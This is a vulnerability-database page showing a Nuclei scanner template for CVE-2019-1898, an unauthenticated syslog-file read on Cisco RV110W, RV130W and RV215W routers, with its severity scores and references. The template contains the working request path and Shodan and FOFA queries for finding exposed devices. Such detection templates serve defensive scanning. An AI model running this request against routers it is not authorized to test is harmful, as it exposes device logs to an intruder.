Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-1898
HistoryAug 21, 2023 - 3:48 p.m.

Cisco RV110W RV130W RV215W Router - Information leakage

2023-08-2115:48:36
ProjectDiscovery
github.com
2
cisco
router
information leakage
vulnerability
web interface
firmware
remote attacker
unauthorized access

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.091 Low

EPSS

Percentile

94.7%

A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
id: CVE-2019-1898

info:
  name: Cisco RV110W RV130W RV215W Router - Information leakage
  author: SleepingBag945
  severity: medium
  description: |
    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by Cisco to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1898
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
    - https://www.tenable.com/security/research/tra-2019-29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-1898
    cwe-id: CWE-425,CWE-285
    epss-score: 0.06856
    epss-percentile: 0.93891
    cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv110w_firmware
    shodan-query: http.favicon.hash:"-646322113"
    fofa-query: icon_hash="-646322113"
  tags: cve,cve2019,cisco,router,iot

http:
  - method: POST
    path:
      - '{{BaseURL}}/_syslog.txt'

    headers:
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 490a0046304402205c2acad7f7d2d4d52189281e29c6c26bad2f26c7adee394510742f8765c37551022009a57ecb499d152c7573a64108a1b620dc777b5f6d97a3b219a28edba0e5509d:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.091 Low

EPSS

Percentile

94.7%

Related for NUCLEI:CVE-2019-1898